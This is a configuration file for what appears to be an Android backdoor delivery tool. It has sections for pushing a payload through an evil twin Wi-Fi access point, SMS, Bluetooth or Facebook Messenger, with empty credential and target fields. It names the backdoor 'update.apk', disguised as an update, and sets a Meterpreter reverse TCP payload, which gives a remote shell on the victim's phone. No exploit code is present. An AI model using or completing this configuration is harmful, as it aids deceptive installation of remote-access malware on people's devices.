[Config]
###########################################
####  DEPLOY THROUGH EVIL TWIN  ###########
###########################################
[AP]

WEBSITE_DIR       = /var/www/html/index.html

###########################################
#### DEPLOY THROUGH SMS ###################
###########################################
[SMS]

SID               = 
TOKEN             = 
TO                = 
FROM              = 
##########################################
#### DEPLOY THROUGH BLUETOOTH ############
##########################################
[BT]

##########################################
#### DEPLOY THROUGH FB MESSENGER #########
##########################################
[FB]

EMAIL         = 
PASS          = 
TARGET        = 

###################################
#### BACKDOOR OPTIONS #############
###################################
[BACKDOOR]

BACKDOOR_NAME     = update.apk
BACKDOOR_PAYLOAD  = android/meterpreter/reverse_tcp


